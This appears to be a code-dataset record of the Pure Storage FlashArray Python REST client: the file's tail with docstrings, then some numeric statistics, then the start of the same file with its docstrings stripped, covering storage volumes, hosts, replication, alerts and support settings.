:returns: A dictionary mapping "phonehome" to "disabled".
:rtype: ResponseDict
"""
return self._set_phonehome(enabled=False)
def disable_remote_assist(self):
"""Disable remote assist.
:returns: A dictionary describing the status of the remote assist
connection.
:rtype: ResponseDict
"""
return self._set_remote_assist(action="disconnect")
def enable_phonehome(self):
"""Enable hourly phonehome.
:returns: A dictionary mapping "phonehome" to "enabled".
:rtype: ResponseDict
"""
return self._set_phonehome(enabled=True)
def enable_remote_assist(self):
"""Enable remote assist.
:returns: A dictionary describing the status of the remote assist
connection.
:rtype: ResponseDict
"""
return self._set_remote_assist(action="connect")
def get_manual_phonehome_status(self):
"""Get manually-initiated phonehome status.
:returns: A dictionary describing the current status of a
manually-initiated phonehome.
:rtype: ResponseDict
"""
return self._request("GET", "array/phonehome")
def get_phonehome(self):
"""Return a dictionary describing if hourly phonehome is enabled.
:returns: A dictionary mapping "phonehome" to "enabled" if hourly
phonehome is enabled, mapping to "disabled" otherwise.
:rtype: ResponseDict
"""
return self.get(phonehome=True)
def get_remote_assist_status(self):
"""Return a dictionary describing whether remote assist is enabled.
:returns: A dictionary describing the current status of the remote
assist connection.
:rtype: ResponseDict
"""
return self._request("GET", "array/remoteassist")
def phonehome(self, action):
"""Manually initiate or cancel a phonehome action.
:type action: str
:param action: The timeframe of logs to phonehome or cancel the current
phonehome.
.. note::
action must be one of: ("send_today", "send_yesterday", "send_all", "cancel").
:returns: A dictionary describing the current status of the phonehome request.
:rtype: ResponseDict
"""
return self._set_phonehome(action=action)
#
# Alerts and audit records
#
def _set_alert_recipient(self, address, **kwargs):
return self._request("PUT", "alert/{0}".format(address), kwargs)
def _set_message(self, message_id, **kwargs):
return self._request("PUT", "message/{0}".format(message_id), kwargs)
def clear_message(self, message_id):
"""Clear an alert message or audit record flag.
:param message_id: ID of the message to unflag.
:type message_id: int or str
:returns: A dictionary mapping "id" to message_id.
:rtype: ResponseDict
"""
return self._set_message(message_id, flagged=False)
def create_alert_recipient(self, address):
"""Add an alert recipient.
:param address: Email address of alert recipient to be created.
:type address: str
:returns: A dictionary mapping "name" to address and "enabled" to True.
:rtype: ResponseDict
"""
return self._request("POST", "alert/{0}".format(address))
def delete_alert_recipient(self, address):
"""Delete an alert recipient.
:param address: Email address of alert recipient to be deleted.
:type address: str
:returns: A dictionary mapping "name" to address.
:rtype: ResponseDict
"""
return self._request("DELETE", "alert/{0}".format(address))
def disable_alert_recipient(self, address):
"""Disable alerts to an alert recipient.
:param address: Email address of alert recipient to be disabled.
:type address: str
:returns: A dictionary mapping "name" to address and "enabled" to False.
:rtype: ResponseDict
"""
return self._set_alert_recipient(address, enabled=False)
def enable_alert_recipient(self, address):
"""Enable alerts to an alert recipient.
:param address: Email address of alert recipient to be enabled.
:type address: str
:returns: A dictionary mapping "name" to address and "enabled" to True.
:rtype: ResponseDict
"""
return self._set_alert_recipient(address, enabled=True)
def flag_message(self, message_id):
"""Flag an alert message or audit record.
:param message_id: ID of message to be flagged.
:type message_id: int or str
:returns: A dictionary mapping "id" to message_id.
:rtype: ResponseDict
"""
return self._set_message(message_id, flagged=True)
def get_alert_recipient(self, address):
"""Return a dictionary describing an alert recipient.
:param address: Email address of alert recipient to get information about.
:type address: str
:returns: A dictionary mapping "name" to address and "enabled" to True
if that alert recipient is enabled, False otherwise.
:rtype: ResponseDict
"""
return self._request("GET", "alert/{0}".format(address))
def list_alert_recipients(self):
"""Return a list of dictionaries describing alert recipients.
:returns: A list of dictionaries mapping "name" to a recipient's
address and "enabled" to True if that recipient is enabled,
False otherwise, for each alert recipient.
:rtype: ResponseList
"""
return self._request("GET", "alert")
def list_messages(self, **kwargs):
"""Return a list of alert messages.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET message**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing each message.
:rtype: ResponseList
"""
return self._request("GET", "message", kwargs)
def test_alert(self):
"""Send test alerts to all recipients.
:returns: A list of dictionaries describing the test outcome for each
recipient.
:rtype: ResponseList
"""
return self._request("PUT", "alert", {"action": "test"})
def test_alert_recipient(self, address):
"""Send a test alert to the specified recipient.
:param address: Address of recipient of test alert.
:type address: str
:returns: A dictionary describing the test outcome.
:rtype: ResponseDict
"""
return self._set_alert_recipient(address, action="test")
#
# SNMP managers
#
def create_snmp_manager(self, manager, host, **kwargs):
"""Create an SNMP manager.
:param manager: Name of manager to be created.
:type manager: str
:param host: IP address or DNS name of SNMP server to be used.
:type host: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST snmp/:manager**
:type \*\*kwargs: optional
:returns: A dictionary describing the created SNMP manager.
:rtype: ResponseDict
"""
data = {"host": host}
data.update(kwargs)
return self._request("POST", "snmp/{0}".format(manager), data)
def delete_snmp_manager(self, manager):
"""Delete an SNMP manager.
:param manager: Name of SNMP manager to be deleted.
:type manager: str
:returns: A dictionary mapping "name" to manager.
:rtype: ResponseDict
"""
return self._request("DELETE", "snmp/{0}".format(manager))
def get_snmp_engine_id(self):
"""Return the SNMP v3 engine ID generated for the array.
:returns: A dictionary mapping "engine_id" to the array's SNMP engine ID.
:rtype: ResponseDict
.. note::
Requires use of SNMP v3.
"""
return self._request("GET", "snmp", {"engine_id": True})
def get_snmp_manager(self, manager):
"""Return a dictionary describing an SNMP manager.
:param manager: Name of SNMP manager to get information about.
:type manager: str
:returns: A dictionary describing manager.
:rtype: ResponseDict
"""
return self._request("GET", "snmp/{0}".format(manager))
def list_snmp_managers(self):
"""Return a list of dictionaries describing SNMP managers.
:returns: A list of dictionaries describing each SNMP manager.
:rtype: ResponseList
"""
return self._request("GET", "snmp")
def rename_snmp_manager(self, manager, name):
"""Rename an SNMP manager.
:param manager: Current name of the SNMP manager to be renamed.
:type manager: str
:param name: New name of the SNMP manager to be renamed.
:type name: str
:returns: A dictionary describing the renamed SNMP manager.
:rtype: ResponseDict
"""
return self.set_snmp_manager(manager, name=name)
def set_snmp_manager(self, manager, **kwargs):
"""Set an attribute of an SNMP manager.
:param manager: Name of the SNMP manager for which to set an attribute.
:type manager: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT snmp/:manager**
:type \*\*kwargs: optional
:returns: A dictionary describing manager.
:rtype: ResponseDict
"""
return self._request("PUT", "snmp/{0}".format(manager), kwargs)
def test_snmp_manager(self, manager):
"""Send a test trap to a manager.
:param manager: SNMP manager to which to send a test trap.
:type manager: str
:returns: A dictionary mapping "output" to the output of the test.
:rtype: ResponseDict
"""
return self.set_snmp_manager(manager, action="test")
#
# Replication related methods
# Note: These methods only work with REST API 1.2 and later
#
def connect_array(self, address, connection_key, connection_type, **kwargs):
"""Connect this array with another one.
:param address: IP address or DNS name of other array.
:type address: str
:param connection_key: Connection key of other array.
:type connection_key: str
:param connection_type: Type(s) of connection desired.
:type connection_type: list
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST array/connection**
:type \*\*kwargs: optional
:returns: A dictionary describing the connection to the other array.
:rtype: ResponseDict
.. note::
Currently, the only type of connection is "replication".
.. note::
Requires use of REST API 1.2 or later.
"""
data = {"address": address,
"connection_key": connection_key,
"type": connection_type}
data.update(kwargs)
return self._request("POST", "array/connection", data)
def disconnect_array(self, address):
"""Disconnect this array from another one.
:param address: IP address or DNS name of other array.
:type address: str
:returns: A dictionary mapping "name" to address.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("DELETE",
"array/connection/{0}".format(address))
def list_array_connections(self, **kwargs):
"""Return list of connected arrays.
:returns: A list of dictionaries describing each connection to another array.
:rtype: ResponseList
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("GET", "array/connection", kwargs)
def throttle_array_connection(self, address, **kwargs):
"""Set bandwidth limits on a connection.
:param address: IP address or DNS name of other array.
:type address: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT array/connection/:address**
:type \*\*kwargs: optional
:returns: A dictionary describing the connection to the other array.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.5 or later.
"""
return self._request("PUT", "array/connection/{0}".format(address), kwargs)
# Protection group related methods
def create_pgroup(self, pgroup, **kwargs):
"""Create pgroup with specified name.
:param pgroup: Name of pgroup to be created.
:type pgroup: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST pgroup/:pgroup**
:type \*\*kwargs: optional
:returns: A dictionary describing the created pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("POST", "pgroup/{0}".format(pgroup), kwargs)
def create_pgroup_snapshot(self, source, **kwargs):
"""Create snapshot of pgroup from specified source.
:param source: Name of pgroup of which to take snapshot.
:type source: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST pgroup**
:type \*\*kwargs: optional
:returns: A dictionary describing the created snapshot.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
# In REST 1.4, support was added for snapshotting multiple pgroups. As a
# result, the endpoint response changed from an object to an array of
# objects. To keep the response type consistent between REST versions,
# we unbox the response when creating a single snapshot.
result = self.create_pgroup_snapshots([source], **kwargs)
if self._rest_version >= LooseVersion("1.4"):
headers = result.headers
result = ResponseDict(result[0])
result.headers = headers
return result
def create_pgroup_snapshots(self, sources, **kwargs):
"""Create snapshots of pgroups from specified sources.
:param sources: Names of pgroups of which to take snapshots.
:type sources: list of str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**POST pgroup**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing the created snapshots.
:rtype: ResponseList
.. note::
Requires use of REST API 1.2 or later.
"""
data = {"source": sources, "snap": True}
data.update(kwargs)
return self._request("POST", "pgroup", data)
def destroy_pgroup(self, pgroup):
"""Destroy an existing pgroup.
:param pgroup: Name of pgroup to be destroyed.
:type pgroup: str
:returns: A dictionary mapping "name" to pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("DELETE", "pgroup/{0}".format(pgroup))
def disable_pgroup_replication(self, pgroup):
"""Disable replication schedule for pgroup.
:param pgroup: Name of pgroup for which to disable replication schedule.
:type pgroup: str
:returns: A dictionary describing pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self.set_pgroup(pgroup, replicate_enabled=False)
def enable_pgroup_replication(self, pgroup):
"""Enable replication schedule for pgroup.
:param pgroup: Name of pgroup for which to enable replication schedule.
:type pgroup: str
:returns: A dictionary describing pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self.set_pgroup(pgroup, replicate_enabled=True)
def disable_pgroup_snapshots(self, pgroup):
"""Disable snapshot schedule for pgroup.
:type pgroup: str
Name of pgroup for which to disable snapshot schedule.
:rtype: ResponseDict
:returns: A dictionary describing pgroup.
.. note::
Requires use of REST API 1.2 or later.
"""
return self.set_pgroup(pgroup, snap_enabled=False)
def enable_pgroup_snapshots(self, pgroup):
"""Enable snapshot schedule for pgroup.
:param pgroup: Name of pgroup for which to enable snapshot schedule.
:type pgroup: str
:returns: A dictionary describing pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self.set_pgroup(pgroup, snap_enabled=True)
def eradicate_pgroup(self, pgroup):
"""Eradicate a destroyed pgroup.
:param pgroup: Name of pgroup to be eradicated.
:type pgroup: str
:returns: A dictionary mapping "name" to pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("DELETE", "pgroup/{0}".format(pgroup),
{"eradicate": True})
def get_pgroup(self, pgroup, **kwargs):
"""Return dictionary describing a pgroup or snapshot.
:param pgroup: Name of pgroup to get information about.
:type pgroup: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET pgroup**
:type \*\*kwargs: optional
:returns: A list describing snapshots of the pgroup if the paramater
snap is passed as True, else a dictionary describing the
pgroup.
:rtype: ResponseDict or ResponseList
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("GET", "pgroup/{0}".format(pgroup), kwargs)
def list_pgroups(self, **kwargs):
"""Return list dictionaries describing each pgroup.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET pgroup**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing each pgroup.
:rtype: ResponseList
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("GET", "pgroup", kwargs)
def recover_pgroup(self, pgroup):
"""Recover a destroyed pgroup that has not yet been eradicated.
:param pgroup: Name of pgroup to be recovered.
:type pgroup: str
:returns: A dictionary mapping "name" to pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self.set_pgroup(pgroup, action="recover")
def rename_pgroup(self, pgroup, name):
"""Rename a pgroup.
:param pgroup: Current name of pgroup to be renamed.
:type pgroup: str
:param name: New name of pgroup to be renamed.
:type name: str
:returns: A dictionary mapping "name" to name.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self.set_pgroup(pgroup, name=name)
def set_pgroup(self, pgroup, **kwargs):
"""Set an attribute of a pgroup.
:param pgroup: Name of pgroup for which to set attribute.
:type pgroup: str
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT pgroup/:pgroup**
:type \*\*kwargs: optional
:returns: A dictionary describing pgroup.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.2 or later.
"""
return self._request("PUT", "pgroup/{0}".format(pgroup), kwargs)
#
# SSL Certificate related methods.
# Note: These methods only work with REST API 1.3 and later
#
def get_certificate(self, **kwargs):
"""Get the attributes of the current array certificate.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET cert**
:type \*\*kwargs: optional
:returns: A dictionary describing the configured array certificate.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.3 or later.
"""
return self._request("GET", "cert", kwargs)
def get_certificate_signing_request(self, **kwargs):
"""Construct a certificate signing request (CSR) for signing by a
certificate authority (CA).
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET cert/certificate_signing_request**
:type \*\*kwargs: optional
:returns: A dictionary mapping "certificate_signing_request" to the CSR.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.3 or later.
"""
return self._request("GET", "cert/certificate_signing_request", kwargs)
def set_certificate(self, **kwargs):
"""Create a self-signed certificate or imports a certificate signed
by a certificate authority (CA).
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**PUT cert**
:type \*\*kwargs: optional
:returns: A dictionary describing the configured array certificate.
:rtype: ResponseDict
.. note::
Requires use of REST API 1.3 or later.
"""
return self._request("PUT", "cert", kwargs)
@staticmethod
def page_through(page_size, function, *args, **kwargs):
"""Return an iterator over all pages of a REST operation.
:param page_size: Number of elements to retrieve per call.
:param function: FlashArray function that accepts limit as an argument.
:param \*args: Positional arguments to be passed to function.
:param \*\*kwargs: Keyword arguments to be passed to function.
:returns: An iterator of tuples containing a page of results for the
function(\*args, \*\*kwargs) and None, or None and a PureError
if a call to retrieve a page fails.
:rtype: iterator
.. note::
Requires use of REST API 1.7 or later.
Only works with functions that accept limit as an argument.
Iterator will retrieve page_size elements per call
Iterator will yield None and an error if a call fails. The next
call will repeat the same call, unless the caller sends in an
alternate page token.
"""
kwargs["limit"] = page_size
def get_page(token):
page_kwargs = kwargs.copy()
if token:
page_kwargs["token"] = token
return function(*args, **page_kwargs)
def page_generator():
token = None
while True:
try:
response = get_page(token)
token = response.headers.get("x-next-token")
except PureError as err:
yield None, err
else:
if response:
sent_token = yield response, None
if sent_token is not None:
token = sent_token
else:
return
return page_generator()
#
# App management methods
#
def get_app(self, app):
"""Get app attributes.
:param app: Name of app to get information about.
:type app: str
:returns: A dictionary describing app.
:rtype: ResponseDict
"""
return self._request("GET", "app/{0}".format(app))
def list_apps(self, **kwargs):
"""Returns a list of dictionaries describing apps.
:param \*\*kwargs: See the REST API Guide on your array for the
documentation on the request:
**GET app**
:type \*\*kwargs: optional
:returns: A list of dictionaries describing each app.
:rtype: ResponseList
"""
return self._request("GET", "app", kwargs)
class ResponseList(list):
"""List type returned by FlashArray object.
:ivar dict headers: The headers returned in the request.
"""
def __init__(self, l=()):
super(ResponseList, self).__init__(l)
self.headers = {}
class ResponseDict(dict):
"""Dict type returned by FlashArray object.
:ivar dict headers: The headers returned in the request.
"""
def __init__(self, d=()):
super(ResponseDict, self).__init__(d)
self.headers = {}
class PureError(Exception):
"""Exception type raised by FlashArray object.
:param reason: A message describing why the error occurred.
:type reason: str
:ivar str reason: A message describing why the error occurred.
"""
def __init__(self, reason):
self.reason = reason
super(PureError, self).__init__()
def __str__(self):
return "PureError: {0}".format(self.reason)
class PureHTTPError(PureError):
"""Exception raised as a result of non-200 response status code.
:param target: IP or DNS name of the array that received the HTTP request.
:type target: str
:param rest_version: The REST API version that was used when making the
request.
:type rest_version: str
:param response: The response of the HTTP request that caused the error.
:type response: :class:`requests.Response`
:ivar str target: IP or DNS name of the array that received the HTTP request.
:ivar str rest_version: The REST API version that was used when making the
request.
:ivar int code: The HTTP response status code of the request.
:ivar dict headers: A dictionary containing the header information. Keys are
case-insensitive.
:ivar str reason: The textual reason for the HTTP status code
(e.g. "BAD REQUEST").
:ivar str text: The body of the response which may contain a message
explaining the error.
.. note::
The error message in text is not guaranteed to be consistent across REST
versions, and thus should not be programmed against.
"""
def __init__(self, target, rest_version, response):
super(PureHTTPError, self).__init__(response.reason)
self.target = target
self.rest_version = rest_version
self.code = response.status_code
self.headers = response.headers
self.text = response.text
def __str__(self):
msg = ("PureHTTPError status code {0} returned by REST "
"version {1} at {2}: {3}\n{4}")
return msg.format(self.code, self.rest_version, self.target,
self.reason, self.text)
| 32.207913 | 91 | 0.589989 |
import json
import requests
from distutils.version import LooseVersion
VERSION = "1.11.3"
class FlashArray(object):
supported_rest_versions = [
"1.11",
"1.10",
"1.9",
"1.8",
"1.7",
"1.6",
"1.5",
"1.4",
"1.3",
"1.2",
"1.1",
"1.0",
]
def __init__(self, target, username=None, password=None, api_token=None,
rest_version=None, verify_https=False, ssl_cert=None,
user_agent=None):
if not api_token and not (username and password):
raise ValueError(
"Must specify API token or both username and password.")
elif api_token and (username or password):
raise ValueError(
"Specify only API token or both username and password.")
self._cookies = {}
self._target = target
self._renegotiate_rest_version = False if rest_version else True
self._verify_https = verify_https
self._ssl_cert = ssl_cert
self._user_agent = user_agent
self._rest_version = rest_version
if self._rest_version:
self._rest_version = self._check_rest_version(rest_version)
else:
self._rest_version = self._choose_rest_version()
self._api_token = (api_token or self._obtain_api_token(username, password))
self._start_session()
def _request(self, method, path, data=None, reestablish_session=True):
if path.startswith("https://"):
url = path
else:
url = "https://{0}/api/{1}/{2}".format(
self._target, self._rest_version, path)
headers = {"Content-Type": "application/json"}
if self._user_agent:
headers['User-Agent'] = self._user_agent
body = json.dumps(data).encode("utf-8")
verify = False
if self._verify_https:
if self._ssl_cert:
verify = self._ssl_cert
else:
verify = True
try:
response = requests.request(method, url, data=body, headers=headers,
cookies=self._cookies, verify=verify)
except requests.exceptions.RequestException as err:
raise PureError(err.message)
if response.status_code == 200:
if "application/json" in response.headers.get("Content-Type", ""):
if response.cookies:
self._cookies.update(response.cookies)
else:
self._cookies.clear()
content = response.json()
if isinstance(content, list):
content = ResponseList(content)
elif isinstance(content, dict):
content = ResponseDict(content)
content.headers = response.headers
return content
raise PureError("Response not in JSON: " + response.text)
elif response.status_code == 401 and reestablish_session:
self._start_session()
return self._request(method, path, data, False)
elif response.status_code == 450 and self._renegotiate_rest_version:
old_version = self._rest_version
self._rest_version = self._choose_rest_version()
if old_version == self._rest_version:
raise PureHTTPError(self._target, str(self._rest_version), response)
return self._request(method, path, data, reestablish_session)
else:
raise PureHTTPError(self._target, str(self._rest_version), response)
def _check_rest_version(self, version):
version = str(version)
if version not in self.supported_rest_versions:
msg = "Library is incompatible with REST API version {0}"
raise ValueError(msg.format(version))
array_rest_versions = self._list_available_rest_versions()
if version not in array_rest_versions:
msg = "Array is incompatible with REST API version {0}"
raise ValueError(msg.format(version))
return LooseVersion(version)
def _choose_rest_version(self):
versions = self._list_available_rest_versions()
versions = [LooseVersion(x) for x in versions if x in self.supported_rest_versions]
if versions:
return max(versions)
else:
raise PureError(
"Library is incompatible with all REST API versions supported"
"by the target array.")
def _list_available_rest_versions(self):
url = "https://{0}/api/api_version".format(self._target)
data = self._request("GET", url, reestablish_session=False)
return data["version"]
def _obtain_api_token(self, username, password):
data = self._request("POST", "auth/apitoken",
{"username": username, "password": password},
reestablish_session=False)
return data["api_token"]
def _start_session(self):
self._request("POST", "auth/session", {"api_token": self._api_token},
reestablish_session=False)
def get_rest_version(self):
return str(self._rest_version)
def invalidate_cookie(self):
self._request("DELETE", "auth/session")
def _set_console_lock(self, **kwargs):
return self._request("PUT", "array/console_lock", kwargs)
def enable_console_lock(self):
return self._set_console_lock(enabled=True)
def disable_console_lock(self):
return self._set_console_lock(enabled=False)
def get(self, **kwargs):
return self._request("GET", "array", kwargs)
def get_console_lock_status(self):
return self._request("GET", "array/console_lock")
def rename(self, name):
return self.set(name=name)
def set(self, **kwargs):
return self._request("PUT", "array", kwargs)
def _set_volume(self, volume, **kwargs):
return self._request("PUT", "volume/{0}".format(volume), kwargs)
def create_snapshot(self, volume, **kwargs):
return self.create_snapshots([volume], **kwargs)[0]
def create_snapshots(self, volumes, **kwargs):
data = {"source": volumes, "snap": True}
data.update(kwargs)
return self._request("POST", "volume", data)
def create_volume(self, volume, size):
return self._request("POST", "volume/{0}".format(volume), {"size":size})
def copy_volume(self, source, dest, **kwargs):
data = {"source": source}
data.update(kwargs)
return self._request("POST", "volume/{0}".format(dest), data)
def destroy_volume(self, volume):
return self._request("DELETE", "volume/{0}".format(volume))
def eradicate_volume(self, volume):
return self._request("DELETE", "volume/{0}".format(volume),
{"eradicate": True})
def extend_volume(self, volume, size):
return self._set_volume(volume, size=size, truncate=False)
def get_volume(self, volume, **kwargs):
return self._request("GET", "volume/{0}".format(volume), kwargs)
def add_volume(self, volume, pgroup):
return self._request("POST", "volume/{0}/pgroup/{1}".format(volume, pgroup))
def remove_volume(self, volume, pgroup):
return self._request("DELETE", "volume/{0}/pgroup/{1}".format(volume, pgroup))
def list_volume_block_differences(self, volume, **kwargs):
return self._request("GET", "volume/{0}/diff".format(volume), kwargs)
def list_volume_private_connections(self, volume, **kwargs):
return self._request("GET", "volume/{0}/host".format(volume), kwargs)
def list_volume_shared_connections(self, volume, **kwargs):
return self._request("GET", "volume/{0}/hgroup".format(volume), kwargs)
def list_volumes(self, **kwargs):
return self._request("GET", "volume", kwargs)
def rename_volume(self, volume, name):
return self._set_volume(volume, name=name)
def recover_volume(self, volume):
return self._set_volume(volume, action="recover")
def truncate_volume(self, volume, size):
return self._set_volume(volume, size=size, truncate=True)
def connect_host(self, host, volume, **kwargs):
return self._request(
"POST", "host/{0}/volume/{1}".format(host, volume), kwargs)
def create_host(self, host, **kwargs):
return self._request("POST", "host/{0}".format(host), kwargs)
def delete_host(self, host):
return self._request("DELETE", "host/{0}".format(host))
def disconnect_host(self, host, volume):
return self._request("DELETE", "host/{0}/volume/{1}".format(host,
volume))
def get_host(self, host, **kwargs):
return self._request("GET", "host/{0}".format(host), kwargs)
def add_host(self, host, pgroup):
return self._request("POST", "host/{0}/pgroup/{1}".format(host, pgroup))
def remove_host(self, host, pgroup):
return self._request("DELETE", "host/{0}/pgroup/{1}".format(host, pgroup))
def list_host_connections(self, host, **kwargs):
return self._request("GET", "host/{0}/volume".format(host), kwargs)
def list_hosts(self, **kwargs):
return self._request("GET", "host", kwargs)
def rename_host(self, host, name):
return self.set_host(host, name=name)
def set_host(self, host, **kwargs):
return self._request("PUT", "host/{0}".format(host), kwargs)
def connect_hgroup(self, hgroup, volume, **kwargs):
return self._request(
"POST", "hgroup/{0}/volume/{1}".format(hgroup, volume), kwargs)
def create_hgroup(self, hgroup, **kwargs):
return self._request("POST", "hgroup/{0}".format(hgroup), kwargs)
def delete_hgroup(self, hgroup):
return self._request("DELETE", "hgroup/{0}".format(hgroup))
def disconnect_hgroup(self, hgroup, volume):
return self._request("DELETE",
"hgroup/{0}/volume/{1}".format(hgroup, volume))
def get_hgroup(self, hgroup, **kwargs):
return self._request("GET", "hgroup/{0}".format(hgroup), kwargs)
def add_hgroup(self, hgroup, pgroup):
return self._request("POST", "hgroup/{0}/pgroup/{1}".format(hgroup, pgroup))
def remove_hgroup(self, hgroup, pgroup):
return self._request("DELETE", "hgroup/{0}/pgroup/{1}".format(hgroup, pgroup))
def list_hgroup_connections(self, hgroup):
return self._request("GET", "hgroup/{0}/volume".format(hgroup))
def list_hgroups(self, **kwargs):
return self._request("GET", "hgroup", kwargs)
def rename_hgroup(self, hgroup, name):
return self.set_hgroup(hgroup, name=name)
def set_hgroup(self, hgroup, **kwargs):
return self._request("PUT", "hgroup/{0}".format(hgroup), kwargs)
def disable_network_interface(self, interface):
return self.set_network_interface(interface, enabled=False)
def enable_network_interface(self, interface):
return self.set_network_interface(interface, enabled=True)
def get_network_interface(self, interface):
return self._request("GET", "network/{0}".format(interface))
def list_network_interfaces(self):
return self._request("GET", "network")
def set_network_interface(self, interface, **kwargs):
return self._request("PUT", "network/{0}".format(interface), kwargs)
def create_subnet(self, subnet, prefix, **kwargs):
data = {"prefix": prefix}
data.update(kwargs)
return self._request("POST", "subnet/{0}".format(subnet), data)
def delete_subnet(self, subnet):
return self._request("DELETE", "subnet/{0}".format(subnet))
def disable_subnet(self, subnet):
return self.set_subnet(subnet, enabled=False)
def enable_subnet(self, subnet):
return self.set_subnet(subnet, enabled=True)
def get_subnet(self, subnet):
return self._request("GET", "subnet/{0}".format(subnet))
def list_subnets(self, **kwargs):
return self._request("GET", "subnet", kwargs)
def rename_subnet(self, subnet, name):
return self.set_subnet(subnet, name=name)
def set_subnet(self, subnet, **kwargs):
return self._request("PUT", "subnet/{0}".format(subnet), kwargs)
def create_vlan_interface(self, interface, subnet, **kwargs):
data = {"subnet": subnet}
data.update(kwargs)
return self._request("POST", "network/vif/{0}".format(interface), data)
def delete_vlan_interface(self, interface):
return self._request("DELETE", "network/{0}".format(interface))
def get_dns(self):
return self._request("GET", "dns")
def set_dns(self, **kwargs):
return self._request("PUT", "dns", kwargs)
def list_ports(self, **kwargs):
return self._request("GET", "port", kwargs)
def get_drive(self, drive):
return self._request("GET", "drive/{0}".format(drive))
def list_drives(self):
return self._request("GET", "drive")
def get_hardware(self, component, **kwargs):
return self._request("GET", "hardware/{0}".format(component), kwargs)
def list_hardware(self, **kwargs):
return self._request("GET", "hardware", kwargs)
def set_hardware(self, component, **kwargs):
return self._request("PUT", "hardware/{0}".format(component), kwargs)
def _list_admin(self, **kwargs):
return self._request("GET", "admin", kwargs)
def _set_admin(self, admin, **kwargs):
return self._request("PUT", "admin/{0}".format(admin), kwargs)
def create_api_token(self, admin, **kwargs):
return self._request("POST", "admin/{0}/apitoken".format(admin), kwargs)
def delete_api_token(self, admin):
return self._request("DELETE", "admin/{0}/apitoken".format(admin))
def get_publickey(self, admin):
return self._request("GET", "admin/{0}".format(admin),
{"publickey": True})
def get_api_token(self, admin, **kwargs):
return self._request("GET", "admin/{0}/apitoken".format(admin))
def list_publickeys(self):
return self._list_admin(publickey=True)
def list_api_tokens(self, **kwargs):
return self._list_admin(api_token=True, **kwargs)
def refresh_admin(self, admin, **kwargs):
return self._set_admin(admin, action="refresh", **kwargs)
def refresh_admins(self):
return self._request("PUT", "admin",
{"action": "refresh", "clear": True})
def set_publickey(self, admin, key):
return self._set_admin(admin, publickey=key)
def set_password(self, admin, new_password, old_password):
return self._set_admin(admin, password=new_password,
old_password=old_password)
def disable_directory_service(self, check_peer=False):
if check_peer:
return self.set_directory_service(check_peer=False)
return self.set_directory_service(enabled=False)
def enable_directory_service(self, check_peer=False):
if check_peer:
return self.set_directory_service(check_peer=True)
return self.set_directory_service(enabled=True)
def get_directory_service(self, **kwargs):
return self._request("GET", "directoryservice", kwargs)
def set_directory_service(self, **kwargs):
return self._request("PUT", "directoryservice", kwargs)
def test_directory_service(self):
return self.set_directory_service(action="test")
def _set_phonehome(self, **kwargs):
return self._request("PUT", "array/phonehome", kwargs)
def _set_remote_assist(self, **kwargs):
return self._request("PUT", "array/remoteassist", kwargs)
def disable_phonehome(self):
return self._set_phonehome(enabled=False)
def disable_remote_assist(self):
return self._set_remote_assist(action="disconnect")
def enable_phonehome(self):
return self._set_phonehome(enabled=True)
def enable_remote_assist(self):
return self._set_remote_assist(action="connect")
def get_manual_phonehome_status(self):
return self._request("GET", "array/phonehome")
def get_phonehome(self):
return self.get(phonehome=True)
def get_remote_assist_status(self):
return self._request("GET", "array/remoteassist")
def phonehome(self, action):
return self._set_phonehome(action=action)
def _set_alert_recipient(self, address, **kwargs):
return self._request("PUT", "alert/{0}".format(address), kwargs)
def _set_message(self, message_id, **kwargs):
return self._request("PUT", "message/{0}".format(message_id), kwargs)
def clear_message(self, message_id):
return self._set_message(message_id, flagged=False)
def create_alert_recipient(self, address):
return self._request("POST", "alert/{0}".format(address))
def delete_alert_recipient(self, address):
return self._request("DELETE", "alert/{0}".format(address))
def disable_alert_recipient(self, address):
return self._set_alert_recipient(address, enabled=False)
def enable_alert_recipient(self, address):
return self._set_alert_recipient(address, enabled=True)
def flag_message(self, message_id):
return self._set_message(message_id, flagged=True)
def get_alert_recipient(self, address):
return self._request("GET", "alert/{0}".format(address))
def list_alert_recipients(self):
return self._request("GET", "alert")
def list_messages(self, **kwargs):
return self._request("GET", "message", kwargs)
def test_alert(self):
return self._request("PUT", "alert", {"action": "test"})
def test_alert_recipient(self, address):
return self._set_alert_recipient(address, action="test")
def create_snmp_manager(self, manager, host, **kwargs):
data = {"host": host}
data.update(kwargs)
return self._request("POST", "snmp/{0}".format(manager), data)
